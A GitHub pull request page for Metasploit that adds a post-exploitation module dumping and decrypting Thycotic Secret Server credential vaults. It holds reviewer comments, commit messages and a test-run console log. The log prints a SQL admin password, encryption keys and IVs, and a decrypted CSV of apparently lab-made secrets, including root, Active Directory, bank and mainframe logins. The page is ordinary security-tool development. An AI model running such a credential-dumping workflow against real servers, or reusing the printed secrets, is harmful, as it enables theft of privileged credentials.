Add thycotic_secretserver_dump post module #16933
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Initial commit for post module targeting Windows servers with Secret Server installed. The module can decrypt secrets from Secret Server version 10.4 - 11.2 provided they are not protected by HSM. An additional auxiliary module is being developed to perform offline decryption and recovery of the database using the loot extracted via this module.
|
I can make an unlicensed installer for SS 11.2 available for testing and validation if need be. Without a license only one user (the built-in admin account) is allowed, and advanced features like replication are disabled, but none of those things should impact this module. |
gwillcox-r7
reviewed
Aug 24, 2022
documentation/modules/post/windows/gather/credentials/thycotic_secretserver_dump.md
Outdated
Show resolved
Hide resolved
gwillcox-r7
reviewed
Aug 24, 2022
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
gwillcox-r7
reviewed
Aug 24, 2022
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Loot clarification changes are required some other comments are recommendations or ideas for improvement.
One optional idea will offer. A check method that evaluates the environment to confirm secretserver is installed and resources required are accessible might be better served to consolidate many of the fail_with(Msf::Exploit::Failure::NoTarget... conditions.
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
|
Hi, thanks for all the great feedback - I'm excited to report that I have recently been gifted installers for Secret Server 8.4 through 11.2, and have made a ton of improvements, fixes, and additional support based on some lab time with various builds. I will hopefully be making a commit soon that includes these changes as well as the revisions suggested here. Watch this space! |
Re-worked version detection code after working with earlier builds of Secret Server. Removed the LastModifiedDate time stamp from the SQL query as it was not available in any but late versions. Added logic for dealing with SQL schema differences between versions. Added support for earlier builds of Secret Server, including pre-10.4 instances, which use different encryption mechanisms. Significant refactor of several methods to support legacy versions of Secret Server. Re-designed the workflow: module now has three actions, "export" dumps the encrypted CSV, "decrypt" will decrypt an exported CSV and "dump" (default) does both. Various bug-fixes and tweaks based on feedback. Changed some of the wording of output messages.
|
Just pushed a commit that has a bunch of changes plus new functional support. |
Added much-needed support for SQL integrated authentication. Significant improvement to the decryption routine: better version detection and less churning through faulty decryption attempts. Various tweaks and optimizations based on feedback. Lots of bug fixes.
Added support for sessionless execution if the SESSION is set to -1. Misc cleanup.
Removed all logic around the isSalted column since I have no idea what that flag is actually supposed to represent. Further optimized Thycotic decryption method for efficiency. Fixed where the revision digit was being truncated after converting ss_build to float. Removed the offline 'decrypt' action as it required setting a reserved value for session in order to operate. Minor tweaks & correct typos and formatting. Updated documentation.
|
Just committed updates to the module and documentation, this should be close to shipshape. Let me know if anything merits further tweaking. |
Significant refactor of exception handling: less 'fail_with', more 'return false'. Optimized interactions with SQL for less code redundancy. Removed references to LOOT_ONLY in the module info. Various tweaks and bug fixes.
jheysel-r7
approved these changes
Sep 29, 2022
There was a problem hiding this comment.
@npm-cesium137-io, thank you so much for the well written module, and for making the changes previously suggested.
I was able to setup Secret Server 11.2 and tested the successfully decryption of multiple different kinds of secrets stored on the server 👌
Everything looks good to me. I usually don't commit my own suggestions but in this case they're just typo fixes so I'm going to get those in and land.
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > set session 2
session => 2
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > run
[*] Hostname WIN-2EEL7BRDUD8 IPv4 172.16.199.132
[*] Decrypt database.config ...
[+] Secret Server SQL Database Connection Configuration:
[+] Instance Name: localhost\SQLEXPRESS
[+] Database Name: SecretServer
[+] Database User: sa
[+] Database Pass: lI8-.y1^qHM!C18f4-t865a^r6hWim8Nl2U
[*] Secret Server Build 11.22
[*] Decrypt encryption.config ...
[+] Secret Server Encryption Configuration:
[+] KEY: 6f59ccbd1ef3490a35099f8287d2704c
[+] KEY256: e4aff609f94fbda6556cc058647d3bdb351fc9bb447c0cb03a4d6b4fdac419d2
[+] IV: 5132b8cd4ac3aa1dbe0217fe30500b74
[*] Performing export of Secret Server SQL database to CSV file
[*] Export Secret Server DB ...
[+] 29 rows exported, 5 unique SecretIDs
[+] Encrypted Secret Server Database Dump: /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_234339.txt
[*] Performing decryption of Secret Server SQL database
[+] 29 rows loaded, 5 unique SecretIDs
[*] Process Secret Server DB ...
[+] 29 rows processed
[*] 15 rows recovered: 0 plaintext, 15 decrypted (14 blank)
[*] 15 rows written (14 blank rows withheld)
[+] 5 unique SecretID records recovered
[+] Decrypted Secret Server Database Dump: /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > cat /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
[*] exec: cat /Users/jheysel/.msf4/loot/20220929125848_default_172.16.199.132_thycotic_secrets_136773.txt
SecretID,Active,SecretType,SecretName,FieldName,Plaintext,Plaintext2
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Machine,test,NULL
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Username,Shhh_its_a_secret,NULL
1,1,Unix Root Account (SSH),Shhh_its_a_secret,Password,Shhh_its_a_secret,NULL
2,1,Active Directory Account,AD_account_secret,Domain,example.test.com,NULL
2,1,Active Directory Account,AD_account_secret,Username,msfuser,NULL
2,1,Active Directory Account,AD_account_secret,Password,N0tpassword@,NULL
3,1,Bank Account,I_have_lots_of_money,BankAccountNumber,1234123412341234,NULL
3,1,Bank Account,I_have_lots_of_money,TransitRoutingNumber,12341234,NULL
3,1,Bank Account,I_have_lots_of_money,NameOfBank,Cash_Money_Bank,NULL
4,1,MySql Account,SQL_secret,Server,sql_server,NULL
4,1,MySql Account,SQL_secret,Username,sa,NULL
4,1,MySql Account,SQL_secret,Password,SuperR00tP@ssword,NULL
5,1,z/OS Mainframe,MainFrameSecret,Machine,MainFrame,NULL
5,1,z/OS Mainframe,MainFrameSecret,Username,Hacker,NULL
5,1,z/OS Mainframe,MainFrameSecret,Password,youvebeenHACKED123!@#,NULL
msf6 post(windows/gather/credentials/thycotic_secretserver_dump) > options
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
modules/post/windows/gather/credentials/thycotic_secretserver_dump.rb
Outdated
Show resolved
Hide resolved
documentation/modules/post/windows/gather/credentials/thycotic_secretserver_dump.md
Outdated
Show resolved
Hide resolved
documentation/modules/post/windows/gather/credentials/thycotic_secretserver_dump.md
Outdated
Show resolved
Hide resolved
documentation/modules/post/windows/gather/credentials/thycotic_secretserver_dump.md
Outdated
Show resolved
Hide resolved
…_secretserver_dump.md
…_secretserver_dump.md
…_secretserver_dump.md
Release NotesThis PR adds a post exploitation module that exports and decrypts Thycotic Secret Server credentials |
jheysel-r7
added
the
rn-modules
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Initial commit for post module targeting Windows servers with Secret Server installed. Very potent if you manage to bag a vulnerable target! This should work against SS 10.4 through 11.2 but has only been tested against 11.2.